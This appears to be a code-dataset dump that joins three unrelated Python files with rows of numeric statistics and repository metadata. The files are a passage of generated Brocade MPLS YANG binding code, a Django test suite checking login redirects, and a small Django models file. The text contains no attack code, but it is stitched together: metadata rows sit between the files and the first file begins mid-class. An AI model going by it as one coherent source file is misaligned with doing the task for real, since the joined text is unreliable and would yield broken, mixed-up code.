self.__lsp_input_dynamic = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-dynamic", rest_name="lsp-input-dynamic", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_brief(self):
"""
Getter method for lsp_input_brief, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_brief (boolean)
YANG Description: Lsp show type is brief
"""
return self.__lsp_input_brief
def _set_lsp_input_brief(self, v, load=False):
"""
Setter method for lsp_input_brief, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_brief (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_brief is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_input_brief() directly.
YANG Description: Lsp show type is brief
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-brief", rest_name="lsp-input-brief", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_brief must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-brief", rest_name="lsp-input-brief", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_brief = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_brief(self):
self.__lsp_input_brief = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-brief", rest_name="lsp-input-brief", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_wide(self):
"""
Getter method for lsp_input_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_wide (boolean)
YANG Description: Lsp show type is brief and wide
"""
return self.__lsp_input_wide
def _set_lsp_input_wide(self, v, load=False):
"""
Setter method for lsp_input_wide, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_wide (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_wide is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_input_wide() directly.
YANG Description: Lsp show type is brief and wide
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-wide", rest_name="lsp-input-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_wide must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-wide", rest_name="lsp-input-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_wide = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_wide(self):
self.__lsp_input_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-wide", rest_name="lsp-input-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_detail(self):
"""
Getter method for lsp_input_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_detail (boolean)
YANG Description: Lsp show type is detail
"""
return self.__lsp_input_detail
def _set_lsp_input_detail(self, v, load=False):
"""
Setter method for lsp_input_detail, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_detail (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_detail is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_input_detail() directly.
YANG Description: Lsp show type is detail
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-detail", rest_name="lsp-input-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_detail must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-detail", rest_name="lsp-input-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_detail = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_detail(self):
self.__lsp_input_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-detail", rest_name="lsp-input-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_extensive(self):
"""
Getter method for lsp_input_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_extensive (boolean)
YANG Description: Lsp show type is extensive
"""
return self.__lsp_input_extensive
def _set_lsp_input_extensive(self, v, load=False):
"""
Setter method for lsp_input_extensive, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_extensive (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_extensive is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_input_extensive() directly.
YANG Description: Lsp show type is extensive
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-extensive", rest_name="lsp-input-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_extensive must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-extensive", rest_name="lsp-input-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_extensive = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_extensive(self):
self.__lsp_input_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-extensive", rest_name="lsp-input-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_debug(self):
"""
Getter method for lsp_input_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_debug (boolean)
YANG Description: Lsp show type is debug
"""
return self.__lsp_input_debug
def _set_lsp_input_debug(self, v, load=False):
"""
Setter method for lsp_input_debug, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_debug (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_debug is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_input_debug() directly.
YANG Description: Lsp show type is debug
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-debug", rest_name="lsp-input-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_debug must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-debug", rest_name="lsp-input-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_debug = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_debug(self):
self.__lsp_input_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-debug", rest_name="lsp-input-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_one(self):
"""
Getter method for lsp_input_one, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_one (boolean)
YANG Description: One Lsp show
"""
return self.__lsp_input_one
def _set_lsp_input_one(self, v, load=False):
"""
Setter method for lsp_input_one, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_one (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_one is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_input_one() directly.
YANG Description: One Lsp show
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-one", rest_name="lsp-input-one", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_one must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-one", rest_name="lsp-input-one", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_one = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_one(self):
self.__lsp_input_one = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-one", rest_name="lsp-input-one", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_all(self):
"""
Getter method for lsp_input_all, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_all (boolean)
YANG Description: All Lsp show
"""
return self.__lsp_input_all
def _set_lsp_input_all(self, v, load=False):
"""
Setter method for lsp_input_all, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_all (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_all is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_input_all() directly.
YANG Description: All Lsp show
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-all", rest_name="lsp-input-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_all must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-all", rest_name="lsp-input-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_all = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_all(self):
self.__lsp_input_all = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-all", rest_name="lsp-input-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
def _get_lsp_input_more(self):
"""
Getter method for lsp_input_more, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_more (boolean)
YANG Description: More Lsps to show
"""
return self.__lsp_input_more
def _set_lsp_input_more(self, v, load=False):
"""
Setter method for lsp_input_more, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/lsp_input_more (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_input_more is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_input_more() directly.
YANG Description: More Lsps to show
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-input-more", rest_name="lsp-input-more", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_input_more must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-more", rest_name="lsp-input-more", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)""",
})
self.__lsp_input_more = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_input_more(self):
self.__lsp_input_more = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-more", rest_name="lsp-input-more", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
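# The __builtin__.property bindings below publish each private accessor pair
# as an ordinary attribute, so callers read and write leaves without touching
# the name-mangled backing fields. A hedged usage sketch (instance name
# hypothetical, as above):
#
#   info.lsp_input_brief = True     # dispatches to _set_lsp_input_brief()
#   flag = info.lsp_input_brief     # dispatches to _get_lsp_input_brief()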
lsp = __builtin__.property(_get_lsp, _set_lsp)
lsp_wide = __builtin__.property(_get_lsp_wide, _set_lsp_wide)
lsp_detail = __builtin__.property(_get_lsp_detail, _set_lsp_detail)
lsp_extensive = __builtin__.property(_get_lsp_extensive, _set_lsp_extensive)
lsp_debug = __builtin__.property(_get_lsp_debug, _set_lsp_debug)
lsp_name = __builtin__.property(_get_lsp_name, _set_lsp_name)
lsp_name_extensive = __builtin__.property(_get_lsp_name_extensive, _set_lsp_name_extensive)
lsp_name_debug = __builtin__.property(_get_lsp_name_debug, _set_lsp_name_debug)
bypass_lsp = __builtin__.property(_get_bypass_lsp, _set_bypass_lsp)
bypass_lsp_wide = __builtin__.property(_get_bypass_lsp_wide, _set_bypass_lsp_wide)
bypass_lsp_detail = __builtin__.property(_get_bypass_lsp_detail, _set_bypass_lsp_detail)
bypass_lsp_extensive = __builtin__.property(_get_bypass_lsp_extensive, _set_bypass_lsp_extensive)
bypass_lsp_debug = __builtin__.property(_get_bypass_lsp_debug, _set_bypass_lsp_debug)
bypass_lsp_name = __builtin__.property(_get_bypass_lsp_name, _set_bypass_lsp_name)
bypass_lsp_name_extensive = __builtin__.property(_get_bypass_lsp_name_extensive, _set_bypass_lsp_name_extensive)
bypass_lsp_name_debug = __builtin__.property(_get_bypass_lsp_name_debug, _set_bypass_lsp_name_debug)
bypass_lsp_static = __builtin__.property(_get_bypass_lsp_static, _set_bypass_lsp_static)
bypass_lsp_static_wide = __builtin__.property(_get_bypass_lsp_static_wide, _set_bypass_lsp_static_wide)
bypass_lsp_static_detail = __builtin__.property(_get_bypass_lsp_static_detail, _set_bypass_lsp_static_detail)
bypass_lsp_static_extensive = __builtin__.property(_get_bypass_lsp_static_extensive, _set_bypass_lsp_static_extensive)
bypass_lsp_static_debug = __builtin__.property(_get_bypass_lsp_static_debug, _set_bypass_lsp_static_debug)
bypass_lsp_static_name = __builtin__.property(_get_bypass_lsp_static_name, _set_bypass_lsp_static_name)
bypass_lsp_static_name_extensive = __builtin__.property(_get_bypass_lsp_static_name_extensive, _set_bypass_lsp_static_name_extensive)
bypass_lsp_static_name_debug = __builtin__.property(_get_bypass_lsp_static_name_debug, _set_bypass_lsp_static_name_debug)
bypass_lsp_dynamic = __builtin__.property(_get_bypass_lsp_dynamic, _set_bypass_lsp_dynamic)
bypass_lsp_dynamic_wide = __builtin__.property(_get_bypass_lsp_dynamic_wide, _set_bypass_lsp_dynamic_wide)
bypass_lsp_dynamic_detail = __builtin__.property(_get_bypass_lsp_dynamic_detail, _set_bypass_lsp_dynamic_detail)
bypass_lsp_dynamic_extensive = __builtin__.property(_get_bypass_lsp_dynamic_extensive, _set_bypass_lsp_dynamic_extensive)
bypass_lsp_dynamic_debug = __builtin__.property(_get_bypass_lsp_dynamic_debug, _set_bypass_lsp_dynamic_debug)
bypass_lsp_dynamic_name = __builtin__.property(_get_bypass_lsp_dynamic_name, _set_bypass_lsp_dynamic_name)
bypass_lsp_dynamic_name_extensive = __builtin__.property(_get_bypass_lsp_dynamic_name_extensive, _set_bypass_lsp_dynamic_name_extensive)
bypass_lsp_dynamic_name_debug = __builtin__.property(_get_bypass_lsp_dynamic_name_debug, _set_bypass_lsp_dynamic_name_debug)
lsp_input_lsp_name = __builtin__.property(_get_lsp_input_lsp_name, _set_lsp_input_lsp_name)
lsp_input_bypass = __builtin__.property(_get_lsp_input_bypass, _set_lsp_input_bypass)
lsp_input_dynamic = __builtin__.property(_get_lsp_input_dynamic, _set_lsp_input_dynamic)
lsp_input_brief = __builtin__.property(_get_lsp_input_brief, _set_lsp_input_brief)
lsp_input_wide = __builtin__.property(_get_lsp_input_wide, _set_lsp_input_wide)
lsp_input_detail = __builtin__.property(_get_lsp_input_detail, _set_lsp_input_detail)
lsp_input_extensive = __builtin__.property(_get_lsp_input_extensive, _set_lsp_input_extensive)
lsp_input_debug = __builtin__.property(_get_lsp_input_debug, _set_lsp_input_debug)
lsp_input_one = __builtin__.property(_get_lsp_input_one, _set_lsp_input_one)
lsp_input_all = __builtin__.property(_get_lsp_input_all, _set_lsp_input_all)
lsp_input_more = __builtin__.property(_get_lsp_input_more, _set_lsp_input_more)
_pyangbind_elements = {'lsp': lsp, 'lsp_wide': lsp_wide, 'lsp_detail': lsp_detail, 'lsp_extensive': lsp_extensive, 'lsp_debug': lsp_debug, 'lsp_name': lsp_name, 'lsp_name_extensive': lsp_name_extensive, 'lsp_name_debug': lsp_name_debug, 'bypass_lsp': bypass_lsp, 'bypass_lsp_wide': bypass_lsp_wide, 'bypass_lsp_detail': bypass_lsp_detail, 'bypass_lsp_extensive': bypass_lsp_extensive, 'bypass_lsp_debug': bypass_lsp_debug, 'bypass_lsp_name': bypass_lsp_name, 'bypass_lsp_name_extensive': bypass_lsp_name_extensive, 'bypass_lsp_name_debug': bypass_lsp_name_debug, 'bypass_lsp_static': bypass_lsp_static, 'bypass_lsp_static_wide': bypass_lsp_static_wide, 'bypass_lsp_static_detail': bypass_lsp_static_detail, 'bypass_lsp_static_extensive': bypass_lsp_static_extensive, 'bypass_lsp_static_debug': bypass_lsp_static_debug, 'bypass_lsp_static_name': bypass_lsp_static_name, 'bypass_lsp_static_name_extensive': bypass_lsp_static_name_extensive, 'bypass_lsp_static_name_debug': bypass_lsp_static_name_debug, 'bypass_lsp_dynamic': bypass_lsp_dynamic, 'bypass_lsp_dynamic_wide': bypass_lsp_dynamic_wide, 'bypass_lsp_dynamic_detail': bypass_lsp_dynamic_detail, 'bypass_lsp_dynamic_extensive': bypass_lsp_dynamic_extensive, 'bypass_lsp_dynamic_debug': bypass_lsp_dynamic_debug, 'bypass_lsp_dynamic_name': bypass_lsp_dynamic_name, 'bypass_lsp_dynamic_name_extensive': bypass_lsp_dynamic_name_extensive, 'bypass_lsp_dynamic_name_debug': bypass_lsp_dynamic_name_debug, 'lsp_input_lsp_name': lsp_input_lsp_name, 'lsp_input_bypass': lsp_input_bypass, 'lsp_input_dynamic': lsp_input_dynamic, 'lsp_input_brief': lsp_input_brief, 'lsp_input_wide': lsp_input_wide, 'lsp_input_detail': lsp_input_detail, 'lsp_input_extensive': lsp_input_extensive, 'lsp_input_debug': lsp_input_debug, 'lsp_input_one': lsp_input_one, 'lsp_input_all': lsp_input_all, 'lsp_input_more': lsp_input_more, }
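# Usage sketch (hypothetical; instances of this generated container are built
# by their parent binding, so `node` below stands in for one). Attribute access
# goes through the generated _get_*/_set_* pairs, and the setters validate
# values via YANGDynClass before storing them:
#
#   node.lsp_input_all = True       # dispatches to _set_lsp_input_all()
#   assert node.lsp_input_all       # dispatches to _get_lsp_input_all()
#   node._unset_lsp_input_all()     # restores the default-constructed value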
| 70.24136 | 1,864 | 0.763148 | 17,860 | 123,976 | 4.954591 | 0.009798 | 0.070585 | 0.055058 | 0.027212 | 0.972347 | 0.954955 | 0.933834 | 0.917707 | 0.896518 | 0.87916 | 0 | 0.000055 | 0.122951 | 123,976 | 1,764 | 1,865 | 70.281179 | 0.813764 | 0.239716 | 0 | 0.53125 | 0 | 0.046336 | 0.348119 | 0.202222 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142241 | false | 0.298491 | 0.008621 | 0 | 0.255388 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8
775aa1ad10bcffa80888b3d6831761ee8e12103a | 3,615 | py | Python | food2/app/tests/test_views.py | Sebastien-M/food2 | 70d60fd5b99baa6a91eaa06aa6924f761d9d9725 | ["MIT"] | 1 | 2019-05-09T01:06:29.000Z | 2019-05-09T01:06:29.000Z | food2/app/tests/test_views.py | Sebastien-M/food2 | 70d60fd5b99baa6a91eaa06aa6924f761d9d9725 | ["MIT"] | 35 | 2019-05-09T01:07:06.000Z | 2021-06-10T17:59:49.000Z | food2/app/tests/test_views.py | Sebastien-M/food2 | 70d60fd5b99baa6a91eaa06aa6924f761d9d9725 | ["MIT"] | 1 | 2020-10-01T04:14:27.000Z | 2020-10-01T04:14:27.000Z |
from django.contrib.auth.models import User
from django.test import Client, TestCase
from django.urls import reverse_lazy
class ViewsTestCase(TestCase):
def __init__(self, *args, **kwargs):
super(ViewsTestCase, self).__init__(*args, **kwargs)
self.client = Client()
def setUp(self):
User.objects.create(username='test',
email='mail@test.com',
password='123')
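        # Note: objects.create() stores the password string unhashed; the
        # tests below never authenticate, so it is harmless here. Use
        # User.objects.create_user() when a test needs to log in.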
def test_recipe_detail_view_not_logged_in(self):
response = self.client.get(reverse_lazy('recipe-detail', kwargs={'pk': 1}), follow=True)
        # redirects to the signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_daily_recipe_view_not_logged_in(self):
response = self.client.get(reverse_lazy('daily-recipe'), follow=True)
        # redirects to the signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_daily_recipe_delete_view_not_logged_in(self):
response = self.client.get(reverse_lazy('daily-recipe-delete', kwargs={'pk': 1}), follow=True)
        # redirects to the signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_week_menu_view_not_logged_in(self):
response = self.client.get(reverse_lazy('week-menu'), follow=True)
        # redirects to the signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_define_recipe_view_not_logged_in(self):
response = self.client.get(reverse_lazy('define-recipe'), follow=True)
        # redirects to the signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_shopping_list_view_not_logged_in(self):
response = self.client.get(reverse_lazy('shopping-list'), follow=True)
        # redirects to the signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_shopping_list_update_view_not_logged_in(self):
response = self.client.get(reverse_lazy('shopping-list-item-update', kwargs={'pk': 1}), follow=True)
        # redirects to the signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_shopping_list_delete_view_not_logged_in(self):
response = self.client.get(reverse_lazy('shopping-list-item-delete', kwargs={'pk': 1}), follow=True)
        # redirects to the signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
def test_shopping_list_create_view_not_logged_in(self):
response = self.client.get(reverse_lazy('shopping-list-item-create'), follow=True)
        # redirects to the signin view when not logged in
self.assertFalse(response.context['user'].is_authenticated)
self.assertEqual(response.request['PATH_INFO'], reverse_lazy('signin'))
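    # A hypothetical logged-in counterpart (not in the original suite): it
    # assumes the 'week-menu' view answers 200 for authenticated users, uses
    # create_user() so the password is hashed, and force_login() to bypass
    # the signin form.
    def test_week_menu_view_logged_in(self):
        user = User.objects.create_user(username='test2',
                                        email='mail2@test.com',
                                        password='123')
        self.client.force_login(user)
        response = self.client.get(reverse_lazy('week-menu'))
        self.assertTrue(response.wsgi_request.user.is_authenticated)
        self.assertEqual(response.status_code, 200)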
| 51.642857 | 108 | 0.708714 | 460 | 3,615 | 5.345652 | 0.136957 | 0.084994 | 0.080521 | 0.109801 | 0.856852 | 0.856852 | 0.856852 | 0.856852 | 0.856852 | 0.856852 | 0 | 0.002341 | 0.172891 | 3,615 | 69 | 109 | 52.391304 | 0.820067 | 0.114246 | 0 | 0.382979 | 0 | 0 | 0.110589 | 0.023496 | 0 | 0 | 0 | 0 | 0.382979 | 1 | 0.234043 | false | 0.021277 | 0.06383 | 0 | 0.319149 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7
91fdef67f0a2bb9f5a2930374e84bb8b769bac94 | 456 | py | Python | app_portfolio_skills/models.py | MichaelDoctor/Portfolio | 41d9104ef6d34f8eb146230b19038b445351c713 | ["MIT"] | null | null | null | app_portfolio_skills/models.py | MichaelDoctor/Portfolio | 41d9104ef6d34f8eb146230b19038b445351c713 | ["MIT"] | 4 | 2021-06-09T18:02:18.000Z | 2022-01-13T03:06:24.000Z | app_portfolio_skills/models.py | MichaelDoctor/Portfolio | 41d9104ef6d34f8eb146230b19038b445351c713 | ["MIT"] | null | null | null |
from django.db import models
class Language(models.Model):
title = models.CharField(max_length=50)
icon = models.CharField(max_length=100)
class Meta:
ordering = ['id']
def __str__(self):
return self.title
class Framework(models.Model):
title = models.CharField(max_length=50)
icon = models.CharField(max_length=100)
class Meta:
ordering = ['id']
def __str__(self):
return self.title
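# Hypothetical shell usage of the two models above (not part of the app code):
#
#   Language.objects.create(title='Python', icon='fab fa-python')
#   Framework.objects.create(title='Django', icon='fab fa-django')  # icon values illustrative
#   Language.objects.all()   # returned in id order, per Meta.ordering
#
# Language and Framework are field-for-field identical; an abstract base model
# could factor out title/icon/Meta if more such models are added.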
| 19 | 43 | 0.651316 | 57 | 456 | 5 | 0.403509 | 0.210526 | 0.252632 | 0.336842 | 0.821053 | 0.821053 | 0.821053 | 0.821053 | 0.821053 | 0.821053 | 0 | 0.028902 | 0.241228 | 456 | 23 | 44 | 19.826087 | 0.794798 | 0 | 0 | 0.8 | 0 | 0 | 0.008772 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.066667 | 0.133333 | 0.866667 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 12
